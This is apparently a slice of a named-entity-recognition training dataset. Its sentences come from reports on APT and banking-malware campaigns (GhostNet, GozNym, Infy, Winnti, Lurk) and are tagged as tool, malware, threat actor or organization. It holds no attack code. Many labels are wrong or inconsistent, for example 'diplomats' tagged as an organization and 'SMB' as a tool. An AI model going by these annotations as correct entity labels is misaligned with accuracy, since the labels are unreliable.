{"text": "These instances of Gh0st RAT are consistently controlled from commercial Internet access accounts located on the island of Hainan , People's Republic of China .", "spans": {"TOOL: Gh0st RAT": [[19, 28]]}, "info": {"id": "dnrti_train_001979", "source": "dnrti_train"}}
{"text": "The fieldwork generated extensive data that allowed us to examine Tibetan information security practices , as well as capture real-time evidence of malware that had penetrated Tibetan computer systems .", "spans": {"ORGANIZATION: Tibetan information security practices": [[66, 104]], "ORGANIZATION: Tibetan": [[176, 183]]}, "info": {"id": "dnrti_train_001980", "source": "dnrti_train"}}
{"text": "It is therefore possible that the large percentage of high value targets identified in our analysis of the GhostNet are coincidental , spread by contact between individuals who previously communicated through e-mail .", "spans": {}, "info": {"id": "dnrti_train_001981", "source": "dnrti_train"}}
{"text": "Where they exist , they often use grey market or pirated software .", "spans": {"TOOL: grey market": [[34, 45]], "TOOL: pirated software": [[49, 65]]}, "info": {"id": "dnrti_train_001982", "source": "dnrti_train"}}
{"text": "Contextually relevant emails are sent to specific targets with attached documents that are packed with exploit code and Trojan horse programmes designed to take advantage of vulnerabilities in software installed on the target 's computer .", "spans": {"MALWARE: documents": [[72, 81]]}, "info": {"id": "dnrti_train_001983", "source": "dnrti_train"}}
{"text": "GhostNet represents a network of compromised computers resident in high-value political , economic , and media locations spread across numerous countries worldwide .", "spans": {}, "info": {"id": "dnrti_train_001984", "source": "dnrti_train"}}
{"text": "After that , the attacker is capable to control the compromised device .", "spans": {}, "info": {"id": "dnrti_train_001985", "source": "dnrti_train"}}
{"text": "The computers of diplomats , military attachés , private assistants , secretaries to Prime Ministers , journalists and others are under the concealed control of unknown assailant (s ) .", "spans": {"ORGANIZATION: diplomats": [[17, 26]], "ORGANIZATION: military attachés": [[29, 46]], "ORGANIZATION: private assistants": [[49, 67]], "ORGANIZATION: secretaries": [[70, 81]], "ORGANIZATION: Prime Ministers": [[85, 100]], "ORGANIZATION: journalists": [[103, 114]]}, "info": {"id": "dnrti_train_001986", "source": "dnrti_train"}}
{"text": "The C&C server ( 82.137.255.56 ) used by the above backdoors was used by APT-C-27 ( Goldmouse ) many times since 2017 .", "spans": {"THREAT_ACTOR: Goldmouse": [[84, 93]]}, "info": {"id": "dnrti_train_001987", "source": "dnrti_train"}}
{"text": "According to 360 Threat Intelligence Center , Goldmouse was observed deploying the nebulous njRAT backdoor .", "spans": {"ORGANIZATION: 360 Threat Intelligence Center": [[13, 43]], "TOOL: njRAT backdoor": [[92, 106]]}, "info": {"id": "dnrti_train_001988", "source": "dnrti_train"}}
{"text": "The banking malware GozNym has legs ; only a few weeks after the hybrid Trojan was discovered , it has reportedly spread into Europe and begun plaguing banking customers in Poland with redirection attacks .", "spans": {"TOOL: GozNym": [[20, 26]], "ORGANIZATION: banking customers": [[152, 169]]}, "info": {"id": "dnrti_train_001989", "source": "dnrti_train"}}
{"text": "The APT group is reportedly targeting the Middle East region .", "spans": {}, "info": {"id": "dnrti_train_001990", "source": "dnrti_train"}}
{"text": "The malware has started targeting corporate , SMB , investment banking and consumer accounts at banks , including some in Portugal and the U.S. , in addition to Poland , according to researchers at IBM 's X-Force team .", "spans": {"TOOL: SMB": [[46, 49]], "ORGANIZATION: IBM 's X-Force": [[198, 212]]}, "info": {"id": "dnrti_train_001991", "source": "dnrti_train"}}
{"text": "According to Kessem the malware has redirection instructions for 17 banks , and features an additional 230 URLs to assist attackers in targeting community banks and email service providers in Poland .", "spans": {"ORGANIZATION: Kessem": [[13, 19]], "ORGANIZATION: email service providers": [[165, 188]]}, "info": {"id": "dnrti_train_001992", "source": "dnrti_train"}}
{"text": "With GozNym , attackers dupe users by showing them the actual bank 's URL and SSL certificate .", "spans": {"TOOL: GozNym": [[5, 11]], "TOOL: URL": [[70, 73]], "TOOL: SSL certificate": [[78, 93]]}, "info": {"id": "dnrti_train_001993", "source": "dnrti_train"}}
{"text": "Fresh from targeting banks in Poland , the banking Trojan GozNym has begun taking aim at banks in Germany .", "spans": {"TOOL: banking Trojan": [[43, 57]], "TOOL: GozNym": [[58, 64]]}, "info": {"id": "dnrti_train_001994", "source": "dnrti_train"}}
{"text": "Attackers went on to use the Trojan to steal $4 million from 24 banks , including 22 in the United States and two in Canada , in just two weeks .", "spans": {}, "info": {"id": "dnrti_train_001995", "source": "dnrti_train"}}
{"text": "Recreating and maintaining fake bank sites can be an arduous task , but Kessem claims the GozNym group appears up to the task .", "spans": {"ORGANIZATION: Kessem": [[72, 78]]}, "info": {"id": "dnrti_train_001996", "source": "dnrti_train"}}
{"text": "The malware is distributed primarily through laced spam emails that lure recipients into opening attachments .", "spans": {}, "info": {"id": "dnrti_train_001997", "source": "dnrti_train"}}
{"text": "Fresh from targeting banks in Poland , the banking Trojan has reportedly begun taking aim at banks in Germany .", "spans": {"TOOL: banking Trojan": [[43, 57]]}, "info": {"id": "dnrti_train_001999", "source": "dnrti_train"}}
{"text": "Now GozNym is now targeting 13 banks and subsidiaries in Germany , Limor Kessem , Executive Security Advisor at IBM , said Tuesday .", "spans": {"TOOL: GozNym": [[4, 10]], "ORGANIZATION: subsidiaries": [[41, 53]], "ORGANIZATION: Kessem": [[73, 79]], "ORGANIZATION: Executive Security": [[82, 100]], "ORGANIZATION: IBM": [[112, 115]]}, "info": {"id": "dnrti_train_002000", "source": "dnrti_train"}}
{"text": "he Trojan , a hybrid of Nymaim and Gozi malware , initially formed in April and thrives on carrying out redirection attacks via DNS poisoning .", "spans": {"TOOL: Nymaim": [[24, 30]], "TOOL: Gozi malware": [[35, 47]]}, "info": {"id": "dnrti_train_002001", "source": "dnrti_train"}}
{"text": "In April , shortly after the Trojan 's discovery , researchers observed a massive GozNym campaign targeting 24 North American banks .", "spans": {}, "info": {"id": "dnrti_train_002002", "source": "dnrti_train"}}
{"text": "The method , which technically redirects users through local DNS poisoning , requires a fair bit of work ; recreating and maintaining fake bank sites can be an arduous task , but Kessem claims the group behind GozNym – Nymaim – appear up to the task .", "spans": {"ORGANIZATION: Kessem": [[179, 185]], "TOOL: GozNym": [[210, 216]]}, "info": {"id": "dnrti_train_002003", "source": "dnrti_train"}}
{"text": "Attackers behind Dyre have used similar tactics in the past but have only deployed their attacks in English speaking countries and Spain .", "spans": {}, "info": {"id": "dnrti_train_002004", "source": "dnrti_train"}}
{"text": "When we last heard from the Trojan , its operators were seen launching redirection attacks on four large , U.S. banks in June .", "spans": {"TOOL: Trojan": [[28, 34]]}, "info": {"id": "dnrti_train_002005", "source": "dnrti_train"}}
{"text": "The fact that the cybercriminals behind GozNym have already adapted the Trojan for three different languages and in countries which have different banking systems is unique , according to Kessem .", "spans": {"TOOL: GozNym": [[40, 46]], "ORGANIZATION: Kessem": [[188, 194]]}, "info": {"id": "dnrti_train_002006", "source": "dnrti_train"}}
{"text": "By the end of April , GozNym had redirection instructions for 17 Polish banks in its repertoire , along with an extra 230 URLs designed to assist attackers in targeting community banks and email service providers in the Eastern European country .", "spans": {"TOOL: GozNym": [[22, 28]], "ORGANIZATION: email service providers": [[189, 212]]}, "info": {"id": "dnrti_train_002007", "source": "dnrti_train"}}
{"text": "Seeking to tease out any possible links between Operation Aurora , VOHO , Operation DeputyDog , and Ephemeral Hydra , we began with Symantec 's Hidden Lynx report as our foundation .", "spans": {"ORGANIZATION: Symantec": [[132, 140]]}, "info": {"id": "dnrti_train_002008", "source": "dnrti_train"}}
{"text": "The authors of that report identify three primary tools used in the campaigns attributed to Hidden Lynx : Trojan.Naid , Backdoor.Moudoor , and Backdoor.Hikit .", "spans": {"TOOL: Trojan.Naid": [[106, 117]], "MALWARE: Backdoor.Moudoor": [[120, 136]], "TOOL: Backdoor.Hikit": [[143, 157]]}, "info": {"id": "dnrti_train_002009", "source": "dnrti_train"}}
{"text": "We will detail how the C&C infrastructure and tools used by hacker group Hidden Lynx during its VOHO campaign ( 2012 ) , excellently documented by Symantec researchers last September , overlap with tools used in other high profile operations during the past few years .", "spans": {"THREAT_ACTOR: Hidden Lynx": [[73, 84]], "ORGANIZATION: Symantec": [[147, 155]]}, "info": {"id": "dnrti_train_002010", "source": "dnrti_train"}}
{"text": "When the New York Times and Mandiant last year unmasked a large scale Chinese hacking operation , pinpointing its location down to the building , the report drew mainstream attention to what security professionals already well knew : sophisticated threat actors carry out persistent cyber operations over months and years .", "spans": {"ORGANIZATION: New York Times": [[9, 23]], "ORGANIZATION: Mandiant": [[28, 36]]}, "info": {"id": "dnrti_train_002011", "source": "dnrti_train"}}
{"text": "Using Recorded Future , we quickly built a timeline of the reported use of those tools in major security incidents , finding many events prior to the early 2013 exposé on Hidden Lynx .", "spans": {"THREAT_ACTOR: Hidden Lynx": [[171, 182]]}, "info": {"id": "dnrti_train_002013", "source": "dnrti_train"}}
{"text": "In particular , FireEye during the fall of 2013 called out infrastructure overlap between Ephemeral Hydra and DeputyDog .", "spans": {"ORGANIZATION: FireEye": [[16, 23]], "TOOL: DeputyDog": [[110, 119]]}, "info": {"id": "dnrti_train_002014", "source": "dnrti_train"}}
{"text": "The above network shows relationships between three tools used by Hidden Lynx during its VOHO campaign : Trojan.Naid , Backdoor.Moudoor , and Backdoor.Hikit .", "spans": {"TOOL: Trojan.Naid": [[105, 116]], "MALWARE: Backdoor.Moudoor": [[119, 135]], "TOOL: Backdoor.Hikit": [[142, 156]]}, "info": {"id": "dnrti_train_002015", "source": "dnrti_train"}}
{"text": "Symantec during 2012 linked the Elderwood Project to Operation Aurora ; Trojan.Naid and Backdoor.Moudoor were also used in Aurora , by the Elderwood Gang , and by Hidden Lynx .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "TOOL: Trojan.Naid": [[72, 83]], "MALWARE: Backdoor.Moudoor": [[88, 104]], "TOOL: Aurora": [[123, 129]], "THREAT_ACTOR: Elderwood Gang": [[139, 153]], "THREAT_ACTOR: Hidden Lynx": [[163, 174]]}, "info": {"id": "dnrti_train_002016", "source": "dnrti_train"}}
{"text": "In addition to these , we also identified \" Macfog \" , a native Mac OS X implementation of Icefog that infected several hundred victims worldwide .", "spans": {"TOOL: Macfog": [[44, 50]], "TOOL: native Mac OS X implementation": [[57, 87]], "TOOL: Icefog": [[91, 97]]}, "info": {"id": "dnrti_train_002017", "source": "dnrti_train"}}
{"text": "Icefog , also known as the \" Dagger Panda \" by Crowdstrike 's naming convention , infected targets mainly in South Korea and Japan .", "spans": {"THREAT_ACTOR: Icefog": [[0, 6]], "THREAT_ACTOR: Dagger Panda": [[29, 41]], "ORGANIZATION: Crowdstrike": [[47, 58]]}, "info": {"id": "dnrti_train_002018", "source": "dnrti_train"}}
{"text": "In 2013 , a public report reveals a group of actors conducted targeted attacks leverage a malware dubbed ICEFOG against mainly government organizations and defense industry of South Korea and Japan .", "spans": {"TOOL: ICEFOG": [[105, 111]], "ORGANIZATION: government organizations": [[127, 151]]}, "info": {"id": "dnrti_train_002019", "source": "dnrti_train"}}
{"text": "Similar to our approach with Symantec 's report on Hidden Lynx , we used Recorded Future to organize the technical details about the DeputyDog attacks to reveal technical information described in the open source reporting across multiple campaigns .", "spans": {"ORGANIZATION: Symantec": [[29, 37]]}, "info": {"id": "dnrti_train_002020", "source": "dnrti_train"}}
{"text": "With Javafog , we are turning yet another page in the Icefog story by discovering another generation of backdoors used by the attackers .", "spans": {"TOOL: Icefog": [[54, 60]]}, "info": {"id": "dnrti_train_002021", "source": "dnrti_train"}}
{"text": "Since January 2013 , we've been on the lookout for a possible RedOctober comeback .", "spans": {"THREAT_ACTOR: RedOctober": [[62, 72]]}, "info": {"id": "dnrti_train_002022", "source": "dnrti_train"}}
{"text": "One possible hit was triggered when we observed Mevade , an unusual piece of malware that appeared late in 2013 .", "spans": {}, "info": {"id": "dnrti_train_002023", "source": "dnrti_train"}}
{"text": "In August 2014 , some of our users observed targeted attacks with a variation of CVE-2012-0158 and an unusual set of malware .", "spans": {"VULNERABILITY: CVE-2012-0158": [[81, 94]]}, "info": {"id": "dnrti_train_002024", "source": "dnrti_train"}}
{"text": "It wasn't until August 2014 that we observed something which made us wonder if RedOctober is back for good .", "spans": {}, "info": {"id": "dnrti_train_002025", "source": "dnrti_train"}}
{"text": "The Cloud Atlas implants utilize a rather unusual C&C mechanism .", "spans": {}, "info": {"id": "dnrti_train_002026", "source": "dnrti_train"}}
{"text": "We named it RedOctober because we started this investigation in October 2012 , an unusually hot month .", "spans": {}, "info": {"id": "dnrti_train_002027", "source": "dnrti_train"}}
{"text": "The attackers upload data to the account , which is downloaded by the implant , decrypted and interpreted .", "spans": {}, "info": {"id": "dnrti_train_002028", "source": "dnrti_train"}}
{"text": "Just like with RedOctober , the top target of Cloud Atlas is Russia , followed closely by Kazakhstan , according to data from the Kaspersky Security Network ( KSN ) .", "spans": {"THREAT_ACTOR: RedOctober": [[15, 25]], "ORGANIZATION: Kaspersky Security Network": [[130, 156]], "ORGANIZATION: KSN": [[159, 162]]}, "info": {"id": "dnrti_train_002029", "source": "dnrti_train"}}
{"text": "In May 2015 , Palo Alto Networks WildFire detected two e-mails carrying malicious documents from a genuine and compromised Israeli Gmail account , sent to an Israeli industrial organization .", "spans": {"ORGANIZATION: Palo Alto Networks WildFire": [[14, 41]], "ORGANIZATION: industrial organization": [[166, 189]]}, "info": {"id": "dnrti_train_002030", "source": "dnrti_train"}}
{"text": "One e-mail carried a Microsoft PowerPoint file named \" thanks.pps \" ( VirusTotal ) , the other a Microsoft Word document named \" request.docx \" .", "spans": {"MALWARE: Microsoft PowerPoint file": [[21, 46]], "MALWARE: thanks.pps": [[55, 65]], "MALWARE: Microsoft Word document": [[97, 120]], "MALWARE: request.docx": [[129, 141]]}, "info": {"id": "dnrti_train_002031", "source": "dnrti_train"}}
{"text": "Around the same time , WildFire also captured an e-mail containing a Word document ( \" hello.docx \" ) with an identical hash as the earlier Word document , this time sent to a U.S. Government recipient .", "spans": {"ORGANIZATION: WildFire": [[23, 31]], "MALWARE: Word document": [[69, 82], [140, 153]], "MALWARE: hello.docx": [[87, 97]]}, "info": {"id": "dnrti_train_002032", "source": "dnrti_train"}}
{"text": "Attacks using this tool were still active as of April 2016 .", "spans": {}, "info": {"id": "dnrti_train_002033", "source": "dnrti_train"}}
{"text": "Considering the language being used in the malicious code is Arabic , it seems that the attacker is familiar with Arabic language as well .", "spans": {}, "info": {"id": "dnrti_train_002034", "source": "dnrti_train"}}
{"text": "The initially-observed \" thanks.pps \" example tricks the user into running the embedded file named ins8376.exe which loads a payload DLL named mpro324.dll .", "spans": {"MALWARE: thanks.pps": [[25, 35]], "MALWARE: ins8376.exe": [[99, 110]], "MALWARE: mpro324.dll": [[143, 154]]}, "info": {"id": "dnrti_train_002035", "source": "dnrti_train"}}
{"text": "In this case , the file used the software name \" Cyberlink \" , and a description of \" CLMediaLibrary Dynamic Link Library \" and listing version 4.19.9.98 .", "spans": {"MALWARE: Cyberlink": [[49, 58]]}, "info": {"id": "dnrti_train_002036", "source": "dnrti_train"}}
{"text": "Unit 42 published a blog at the beginning of May titled \" Prince of Persia \" , in which we described the discovery of a decade-long campaign using a formerly unknown malware family , Infy , that targeted government and industry interests worldwide .", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "TOOL: Infy": [[183, 187]]}, "info": {"id": "dnrti_train_002037", "source": "dnrti_train"}}
{"text": "We noted in our original blog the large amount of targeting of Iranian citizens in this campaign , we observed almost one-third of all victims to be Iranian .", "spans": {"ORGANIZATION: citizens": [[71, 79]]}, "info": {"id": "dnrti_train_002038", "source": "dnrti_train"}}
{"text": "In addition to the original \" Infy \" variant , we also see the newer , more sophisticated , interactive , and fuller-featured \" Infy M \" variant deployed against apparently-higher-value targets .", "spans": {"TOOL: Infy": [[30, 34]], "TOOL: Infy M": [[128, 134]]}, "info": {"id": "dnrti_train_002039", "source": "dnrti_train"}}
{"text": "This documentation provides new insight into intrusion efforts conducted by at least four discrete Iranian threat actors , Rocket Kitten , Infy , Sima , and Operation Cleaver , including groups and tools that have not been previously disclosed .", "spans": {"THREAT_ACTOR: Rocket Kitten": [[123, 136]], "THREAT_ACTOR: Infy": [[139, 143]], "THREAT_ACTOR: Sima": [[146, 150]]}, "info": {"id": "dnrti_train_002040", "source": "dnrti_train"}}
{"text": "Since early 2013 , we have observed activity from a unique threat actor group , which we began to investigate based on increased activities against human right activists in the beginning of 2015 .", "spans": {"ORGANIZATION: activists": [[160, 169]]}, "info": {"id": "dnrti_train_002041", "source": "dnrti_train"}}
{"text": "Over the course of three years of observation of campaigns targeting civil society and human rights organizations , from records of well over two hundred spearphishing and other intrusion attempts against individuals inside of Iran and in the diaspora , a narrative of persistent intrusion efforts emerges .", "spans": {"ORGANIZATION: human rights organizations": [[87, 113]], "ORGANIZATION: diaspora": [[243, 251]]}, "info": {"id": "dnrti_train_002042", "source": "dnrti_train"}}
{"text": "Thanks to information we have been able to collect during the course of our research , such as characteristics of the group 's malware and development cycle , our research strongly supports the claim that the Infy group is of Iranian origin and potentially connected to the Iranian state .", "spans": {"THREAT_ACTOR: Infy": [[209, 213]]}, "info": {"id": "dnrti_train_002043", "source": "dnrti_train"}}
{"text": "Amongst a backdrop of other incidents , Infy became one of the most frequently observed agents for attempted malware attacks against Iranian civil society beginning in late 2014 , growing in use up to the February 2016 parliamentary election in Iran .", "spans": {}, "info": {"id": "dnrti_train_002044", "source": "dnrti_train"}}
{"text": "Until the publication of the Palo Alto report , the developers of the Infy appeared to be actively updating and maintaining the codebase , and new releases were distributed to existing , as well as new , targets quite regularly .", "spans": {"ORGANIZATION: Palo Alto": [[29, 38]], "TOOL: Infy": [[70, 74]]}, "info": {"id": "dnrti_train_002045", "source": "dnrti_train"}}
{"text": "Other samples were found bearing a compilation time as early as June 2012 and version 00002 .", "spans": {}, "info": {"id": "dnrti_train_002046", "source": "dnrti_train"}}
{"text": "Over the months following the elections , the accounts of Iranians that had been compromised by the actors were then used for spreading the malware .", "spans": {"ORGANIZATION: Iranians": [[58, 66]]}, "info": {"id": "dnrti_train_002047", "source": "dnrti_train"}}
{"text": "When activities targeting of civil society subsided , the actors instead appeared to have focused on external targets , such a series of attempts to spearphish the Danish Ministry of Foreign Affairs .", "spans": {}, "info": {"id": "dnrti_train_002048", "source": "dnrti_train"}}
{"text": "Palo Alto Networks has noted and described the differences of two malware agents developed in parallel , with commonalities in behavior but differing functionalities ; families described as Infy and Infy M. Our primary observation was of the Infy ( non-M ) malware , which primarily functions as a keylogger for the collection of account credentials .", "spans": {"ORGANIZATION: Palo Alto Networks": [[0, 18]], "TOOL: Infy": [[190, 194], [242, 246]], "TOOL: Infy M.": [[199, 206]], "TOOL: malware": [[257, 264]], "TOOL: keylogger": [[298, 307]]}, "info": {"id": "dnrti_train_002049", "source": "dnrti_train"}}
{"text": "Our observation of Infy 's campaigns , primarily through the lens of spearphishing attacks against Iranian civil society and media organizations , indicates a wandering focus on particular demographics on a strategic basis over time .", "spans": {"ORGANIZATION: media organizations": [[125, 144]]}, "info": {"id": "dnrti_train_002050", "source": "dnrti_train"}}
{"text": "The Infy malware was seen targeting Iranians again in June 2015 , when it was shared with researchers after being sent to a broadcast journalist at BBC Persian with a generic introduction and a PowerPoint presentation attached titled \" Nostalogy \" ( sic ) .", "spans": {"TOOL: Infy malware": [[4, 16]], "ORGANIZATION: Iranians": [[36, 44]], "ORGANIZATION: broadcast journalist": [[124, 144]], "TOOL: PowerPoint": [[194, 204]]}, "info": {"id": "dnrti_train_002051", "source": "dnrti_train"}}
{"text": "Based on information collected in the course of this research , the targets and victims of Infy 's campaigns have continued to be strongly aligned with Iran 's \" soft war \" agenda , internal security policies , and regional adversaries of the hardline establishment of the Islamic Republic of Iran .", "spans": {}, "info": {"id": "dnrti_train_002052", "source": "dnrti_train"}}
{"text": "Until late December 2015 , in nearly every Infy message documented since our tracking began in May 2013 , no attempt included strong tailoring of the approach , often not even including an email body , instead relying on cryptic filenames and email subjects to attract interest .", "spans": {"TOOL: Infy message": [[43, 55]]}, "info": {"id": "dnrti_train_002053", "source": "dnrti_train"}}
{"text": "One narrowly-targeted spearphishing from Infy was sent from the compromised account of a political activist promoting participation inside of Iran , claiming to be a set of images of a British-Iranian dual national that has been held in Evin Prison for five years on espionage charges .", "spans": {"ORGANIZATION: political activist": [[89, 107]], "ORGANIZATION: British-Iranian": [[185, 200]]}, "info": {"id": "dnrti_train_002054", "source": "dnrti_train"}}
{"text": "As in the past , these messages have been sent accounts believed to be fake and accounts compromised by Infy , including Kurdish activists that had previously been compromised by the Flying Kitten actor group .", "spans": {"ORGANIZATION: Kurdish activists": [[121, 138]], "THREAT_ACTOR: Flying Kitten actor group": [[183, 208]]}, "info": {"id": "dnrti_train_002055", "source": "dnrti_train"}}
{"text": "The actors successfully compromised a host of an Saudi government institutions on January 17 , 2016 , and maintained access for at least two weeks .", "spans": {"ORGANIZATION: government institutions": [[55, 78]]}, "info": {"id": "dnrti_train_002056", "source": "dnrti_train"}}
{"text": "The Infy group also appears to engage in espionage activities against foreign governments and businesses .", "spans": {"THREAT_ACTOR: Infy group": [[4, 14]]}, "info": {"id": "dnrti_train_002057", "source": "dnrti_train"}}
{"text": "In order to initially compromise the designated targets , Infy typically distributed specifically-crafted malicious documents containing Infy through spearphishing attacks .", "spans": {"TOOL: Infy": [[137, 141]]}, "info": {"id": "dnrti_train_002058", "source": "dnrti_train"}}
{"text": "In order to initially compromise the designated targets , the attackers typically distributed specifically-crafted malicious documents containing Infy through spearphishing attacks .", "spans": {"TOOL: Infy": [[146, 150]]}, "info": {"id": "dnrti_train_002059", "source": "dnrti_train"}}
{"text": "On May 2 , 2016 , Palo Alto Networks published the report \" Prince of Persia \" , which provided the first public and widely-reported indication of Infy 's activities in Iran , while other publications either refrained from making the association or were not openly available .", "spans": {"ORGANIZATION: Palo Alto Networks": [[18, 36]], "THREAT_ACTOR: Infy": [[147, 151]]}, "info": {"id": "dnrti_train_002060", "source": "dnrti_train"}}
{"text": "Prior to the distribution of new versions of the agent , the Infy developers appear to consistently conduct tests from local hosts , which indicates that the control and maintenance of the software occurs in the Khorasan Razavi province of Iran , potentially in the city of Mashhad .", "spans": {"TOOL: Infy": [[61, 65]]}, "info": {"id": "dnrti_train_002061", "source": "dnrti_train"}}
{"text": "On May 2 , 2016 , Palo Alto published the report \" Prince of Persia \" , which provided the first public and widely-reported indication of Infy 's activities in Iran , while other publications either refrained from making the association or were not openly available .", "spans": {"ORGANIZATION: Palo Alto": [[18, 27]]}, "info": {"id": "dnrti_train_002062", "source": "dnrti_train"}}
{"text": "Only one client , based in Iran , continued to communicate with the infrastructure .", "spans": {}, "info": {"id": "dnrti_train_002063", "source": "dnrti_train"}}
{"text": "A researcher has attributed a recently publicized attack on Citrix' internal network to the Iranian-linked group known as IRIDIUM – and said that the data heist involved 6 terabytes of sensitive data .", "spans": {"ORGANIZATION: Citrix'": [[60, 67]]}, "info": {"id": "dnrti_train_002064", "source": "dnrti_train"}}
{"text": "\" IRIDIUM has hit more than 200 government agencies , oil and gas companies and technology companies , including Citrix Systems Inc \" , they said .", "spans": {"ORGANIZATION: government agencies": [[32, 51]], "ORGANIZATION: gas companies": [[62, 75]], "ORGANIZATION: technology companies": [[80, 100]], "ORGANIZATION: Citrix Systems Inc": [[113, 131]]}, "info": {"id": "dnrti_train_002065", "source": "dnrti_train"}}
{"text": "Citrix told Threatpost that this is indeed the same password-spraying attack it announced itself last week – but it wouldn't confirm the other details in Resecurity 's post , including the attribution .", "spans": {"ORGANIZATION: Citrix": [[0, 6]], "ORGANIZATION: Resecurity": [[154, 164]]}, "info": {"id": "dnrti_train_002066", "source": "dnrti_train"}}
{"text": "In wake of these events , a security firm Resecurity reached out to NBC news and claimed that they had reasons to believe that the attacks were carried out by Iranian-linked group known as IRIDIUM .", "spans": {"ORGANIZATION: security firm": [[28, 41]], "ORGANIZATION: Resecurity": [[42, 52]]}, "info": {"id": "dnrti_train_002067", "source": "dnrti_train"}}
{"text": "Resecurity says that IRIDIUM \" has hit more than 200 government agencies , oil and gas companies , and technology companies including Citrix .", "spans": {"ORGANIZATION: Resecurity": [[0, 10]], "ORGANIZATION: government agencies": [[53, 72]], "ORGANIZATION: gas companies": [[83, 96]], "ORGANIZATION: technology companies": [[103, 123]], "ORGANIZATION: Citrix": [[134, 140]]}, "info": {"id": "dnrti_train_002068", "source": "dnrti_train"}}
{"text": "Resecurity claims that IRIDIUM breached Citrix 's network during December 2018 .", "spans": {"ORGANIZATION: Resecurity": [[0, 10]], "ORGANIZATION: Citrix": [[40, 46]]}, "info": {"id": "dnrti_train_002069", "source": "dnrti_train"}}
{"text": "Infy engaged in malware spearphishing against the same targets as Flying Kitten from the outset of its campaign ; Operation Cleaver has registered several resources related to development agencies that have been the subject of intrusion attempts by others since February 2014 .", "spans": {"TOOL: Infy": [[0, 4]], "ORGANIZATION: development agencies": [[176, 196]]}, "info": {"id": "dnrti_train_002070", "source": "dnrti_train"}}
{"text": "The malicious samples we found are the early stage malware most often delivered by spear-phishing e-mails .", "spans": {}, "info": {"id": "dnrti_train_002071", "source": "dnrti_train"}}
{"text": "This next stage library copies itself into the System32 directory of the Windows folder after the hardcoded file name — either KBDLV2.DLL or AUTO.DLL , depending on the malware sample .", "spans": {"MALWARE: KBDLV2.DLL": [[127, 137]], "MALWARE: AUTO.DLL": [[141, 149]]}, "info": {"id": "dnrti_train_002072", "source": "dnrti_train"}}
{"text": "At this stage , the malware gathers information about the infected computer .", "spans": {}, "info": {"id": "dnrti_train_002073", "source": "dnrti_train"}}
{"text": "Hancom Office is widely used in South Korea .", "spans": {}, "info": {"id": "dnrti_train_002074", "source": "dnrti_train"}}
{"text": "Perhaps it also points to the suspected North Korean origin of attack .", "spans": {}, "info": {"id": "dnrti_train_002075", "source": "dnrti_train"}}
{"text": "The attacker is from North Korea .", "spans": {}, "info": {"id": "dnrti_train_002076", "source": "dnrti_train"}}
{"text": "All of them lie in ranges of the Jilin Province Network and Liaoning Province Network , in China .", "spans": {}, "info": {"id": "dnrti_train_002077", "source": "dnrti_train"}}
{"text": "Finally , this geo-location supports the likely theory that the attackers behind Kimsuky are based in North Korea .", "spans": {"THREAT_ACTOR: Kimsuky": [[81, 88]]}, "info": {"id": "dnrti_train_002078", "source": "dnrti_train"}}
{"text": "According to the German press , the intruders used the Winnti family of malware as their main implant , giving them persistent access to the conglomerate 's network as early as February 2016 .", "spans": {"TOOL: Winnti family of malware": [[55, 79]]}, "info": {"id": "dnrti_train_002080", "source": "dnrti_train"}}
{"text": "To show how this breach and similar breaches can be mitigated , we look at how Windows Defender ATP flags activities associated with BARIUM , LEAD , and other known activity groups and how it provides extensive threat intelligence about these groups .", "spans": {"ORGANIZATION: Windows Defender ATP": [[79, 99]]}, "info": {"id": "dnrti_train_002083", "source": "dnrti_train"}}
{"text": "During these intrusions , LEAD 's objective was to steal sensitive data , including research materials , process documents , and project plans .", "spans": {}, "info": {"id": "dnrti_train_002085", "source": "dnrti_train"}}
{"text": "Microsoft Analytics shows that Winnti has been used in intrusions carried out throughout Asia , Europe , Oceania , the Middle East , and the United States in the last six months ( Figure 1 ) .", "spans": {"ORGANIZATION: Microsoft Analytics": [[0, 19]], "TOOL: Winnti": [[31, 37]]}, "info": {"id": "dnrti_train_002089", "source": "dnrti_train"}}
{"text": "Instead , Lead often simply emails a Winnti installer to potential victims , relying on basic social engineering tactics to convince recipients to run the attached malware .", "spans": {"TOOL: Winnti installer": [[37, 53]]}, "info": {"id": "dnrti_train_002090", "source": "dnrti_train"}}
{"text": "This was the case in two known intrusions in 2015 , where attackers named the implant DLL \" ASPNET_FILTER.DLL \" to disguise it as the DLL for the ASP.NET ISAPI Filter .", "spans": {"MALWARE: ASPNET_FILTER.DLL": [[92, 109]], "MALWARE: ASP.NET ISAPI Filter": [[146, 166]]}, "info": {"id": "dnrti_train_002092", "source": "dnrti_train"}}
{"text": "And , finally , with the upcoming Creators Update , Windows Defender ATP will provide additional capabilities for detecting threats such as Winnti , as well as centralized response options , such as machine isolation and file blocking , that will enable fast containment of known attack jump off points .", "spans": {"TOOL: Creators Update": [[34, 49]], "ORGANIZATION: Windows Defender ATP": [[52, 72]]}, "info": {"id": "dnrti_train_002097", "source": "dnrti_train"}}
{"text": "The police suspected Lurk of stealing nearly three billion rubles , using malicious software to systematically withdraw large sums of money from the accounts of commercial organizations , including banks .", "spans": {"TOOL: Lurk": [[21, 25]], "ORGANIZATION: commercial organizations": [[161, 185]]}, "info": {"id": "dnrti_train_002098", "source": "dnrti_train"}}
{"text": "When we first encountered Lurk , in 2011 , it was a nameless Trojan .", "spans": {"TOOL: Lurk": [[26, 30]]}, "info": {"id": "dnrti_train_002099", "source": "dnrti_train"}}
{"text": "This article is an attempt to share this experience with other experts , particularly the IT security specialists in companies and financial institutions that increasingly find themselves the targets of cyber-attacks .", "spans": {"ORGANIZATION: financial institutions": [[131, 153]]}, "info": {"id": "dnrti_train_002101", "source": "dnrti_train"}}
{"text": "In most cases , the attackers only had to infect the computer on which the RBS software was installed in order to start stealing the cash .", "spans": {}, "info": {"id": "dnrti_train_002102", "source": "dnrti_train"}}
{"text": "We were soon able to help investigate another incident involving Lurk .", "spans": {"TOOL: Lurk": [[65, 69]]}, "info": {"id": "dnrti_train_002103", "source": "dnrti_train"}}
{"text": "This event significantly affected the Russian cybercriminal world as the gang had stolen hundreds of millions of rubles during a few years of activity , and was considered a \" leader \" among cybercriminals .", "spans": {}, "info": {"id": "dnrti_train_002104", "source": "dnrti_train"}}
{"text": "In Russia , there were several relatively large cybercriminal groups engaged in financial theft via attacks on RBS .", "spans": {}, "info": {"id": "dnrti_train_002105", "source": "dnrti_train"}}
